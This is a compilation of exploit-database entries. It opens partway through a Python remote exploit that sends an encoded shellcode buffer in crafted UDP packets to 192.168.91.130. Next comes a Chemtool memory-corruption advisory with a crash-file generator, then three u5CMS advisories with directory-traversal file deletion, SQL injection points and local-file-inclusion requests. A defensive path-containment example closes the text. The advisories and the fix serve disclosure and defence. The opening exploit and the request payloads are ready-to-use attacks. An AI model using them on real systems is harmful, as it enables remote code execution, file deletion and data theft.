buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
-
Chemtool 1.6.14 - Memory Corruption
Document Title:
===============
Chemtool 1.6.14 Memory Corruption Vulnerability

Date:
=============
08/02/2015

Vendor Homepage:
================
http://ruby.chemie.uni-freiburg.de/~martin/chemtool/

Abstract Advisory Information:
==============================
Memory Corruption Vulnerability on Chemtool 1.6.14.

Affected Product(s):
====================
Chemtool 1.6.14 or older

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A memory corruption vulnerability is detected on Chemtool 1.6.14. An attacker can crash the software by using an input file. Also, an attacker can crash the software by entering a filename that is too long.

b77a8000-b77a9000 r--s 00000000 08:01 152558     /var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4
b77a9000-b77aa000 r--s 00000000 00:15 209651     /run/user/1000/dconf/user
b77aa000-b77bb000 r-xp 00000000 08:01 393480     /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bb000-b77bc000 r--p 00010000 08:01 393480     /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bc000-b77bd000 rw-p 00011000 08:01 393480     /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bd000-b77be000 rwxp 00000000 00:00 0
b77be000-b77bf000 r--p 00855000 08:01 274691     /usr/lib/locale/locale-archive
b77bf000-b77c0000 r--p 00596000 08:01 274691     /usr/lib/locale/locale-archive
b77c0000-b77c2000 rw-p 00000000 00:00 0
b77c2000-b77c3000 r-xp 00000000 00:00 0          [vdso]
b77c3000-b77e3000 r-xp 00000000 08:01 132074     /lib/i386-linux-gnu/ld-2.19.so
b77e3000-b77e4000 r--p 0001f000 08:01 132074     /lib/i386-linux-gnu/ld-2.19.so
b77e4000-b77e5000 rw-p 00020000 08:01 132074     /lib/i386-linux-gnu/ld-2.19.so
bfeff000-bff21000 rw-p 00000000 00:00 0          [stack]
Aborted (core dumped)

Proof of Concept (PoC):
=======================
This vulnerability can be exploited by local attackers with user interaction.

First test.
An attacker can generate a malicious file (format .png). This file can produce stack smashing.

#!/usr/bin/ruby
buf = "a"*3000
filename = "crash.png"
file = open(filename,'w')
file.write(buf)
file.close
puts "file created!"

Second test.
An attacker can enter a filename that is too long. For example, this program needs to receive a parameter. If this parameter is too long, it will crash.

$ chemtool $(perl -e 'print "A"x900')

How to perform:
=======================
1) You can test it with gdb. Attach it to this application.
2) Run it; now you can pass the "crash.png" file that we generated with our Ruby script to the application. Also, you can run it with a long argv[1] value.

When you perform the above steps, the application will crash. Analyze it in gdb.

Solution - Fix & Patch:
=======================
Restrict the maximum working size. I believe that this bug doesn't have a solution.

Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of the local crash method.

Authors:
==================
Pablo González
-
u5CMS 3.9.3 - 'deletefile.php' Arbitrary File Deletion
u5CMS 3.9.3 (deletefile.php) Arbitrary File Deletion Vulnerability

Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache.

Desc: Input passed to the 'f' parameter in 'deletefile.php' is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected GET parameter.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5226
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5226.php

29.12.2014

---

Target: C:\deleteme.txt
-----------------------

GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=/deleteme.txt HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../../../../../../deleteme.txt HTTP/1.1
-
u5CMS 3.9.3 - Multiple SQL Injections
u5CMS 3.9.3 Multiple SQL Injection Vulnerabilities

Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache.

Desc: Input passed via multiple parameters in multiple scripts is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5225
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5225.php

29.12.2014

---

1. POST /u5cms/u5admin/copy2.php?name=album HTTP/1.1
   name=album[INJECT]

2. GET /u5cms/u5admin/editor.php?c=start[INJECT] HTTP/1.1

3. GET /u5cms/u5admin/localize.php?name=album[INJECT] HTTP/1.1

4. POST /u5cms/u5admin/meta2.php?typ=a[INJECT]&uri=metai.php HTTP/1.1

5. GET /u5cms/u5admin/metai.php?typ=a&name=album[INJECT] HTTP/1.1

6. GET /u5cms/u5admin/nc.php?name=o[INJECT] HTTP/1.1

7. POST /u5cms/u5admin/new2.php?typ=e HTTP/1.1
   name=test[INJECT]&typ=e

8. POST /u5cms/u5admin/rename2.php?name=album HTTP/1.1
   name=album2[INJECT]&ulinks=yes

9. GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum2[INJECT]&typ=a HTTP/1.1
-
u5CMS 3.9.3 - 'thumb.php' Local File Inclusion
u5CMS 3.9.3 (thumb.php) Local File Inclusion Vulnerability

Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache.

Desc: u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when input passed thru the 'f' parameter to thumb.php script is not properly verified before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5224
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5224.php

29.12.2014

---

GET /u5cms/thumb.php?w=100&f=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
GET /u5cms/thumb.php?w=100&f=/windows/win.ini HTTP/1.1
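The deletefile.php and thumb.php advisories above share one root cause: the 'f' parameter is used as a filesystem path with no check that it stays inside the directory the script is meant to serve, so both an absolute path and a run of ../ or ..\ segments reach a file elsewhere. The following Python example is added here and is not u5CMS code; the upload directory /var/www/u5cms/files is an assumed location and the sample 'f' values are constructed from the two advisories plus benign names. It shows the containment check that would block both requests: normalise separators, refuse absolute paths and drive letters, refuse NUL bytes, normalise the joined path and keep it only if the configured root is still its prefix. It uses posixpath string functions on purpose, so the decision does not depend on which files exist on disk.

```python
import posixpath
import re

# Hypothetical upload directory; u5CMS's real layout is not described in the advisories.
UPLOAD_ROOT = "/var/www/u5cms/files"

# Constructed 'f' values: benign names, the advisories' traversal and absolute
# forms (deletefile.php and thumb.php), and a NUL-truncation attempt.
SAMPLES = [
    "photo.jpg",
    "album/cover.png",
    "sub/../photo.jpg",
    "/deleteme.txt",
    "../../../../../../deleteme.txt",
    "..\\..\\..\\windows\\win.ini",
    "/windows/win.ini",
    "photo.jpg\x00.php",
]


def resolve_under_root(user_path, root=UPLOAD_ROOT):
    """Return the normalised absolute path for user_path if it stays inside root,
    otherwise None. Pure string logic, so nothing touches the disk."""
    if "\x00" in user_path:
        return None                               # NUL truncates the name in C-level file APIs
    normalized = user_path.replace("\\", "/")     # treat Windows separators like '/'
    if posixpath.isabs(normalized) or re.match(r"^[A-Za-z]:", normalized):
        return None                               # absolute paths and drive letters are never valid here
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, normalized))
    if candidate == root:
        return None                               # the root directory itself is not a file
    if posixpath.commonpath([root, candidate]) != root:
        return None                               # '..' segments climbed out of the root
    return candidate


def classify(paths):
    """Map each candidate 'f' value to its resolved path, or None when rejected."""
    return {p: resolve_under_root(p) for p in paths}


if __name__ == "__main__":
    for p, resolved in classify(SAMPLES).items():
        print(f"{p!r:40} -> {resolved or 'REJECTED'}")
```

The check runs after normalisation rather than by scanning for "../" in the raw string, which is what makes it robust against mixed separators and repeated segments; sub/../photo.jpg is accepted because it resolves inside the root, while every form in the two advisories resolves outside it. A stricter deployment can additionally require the resolved name to appear in the application's own file index, so that only files the CMS created can be deleted or rendered.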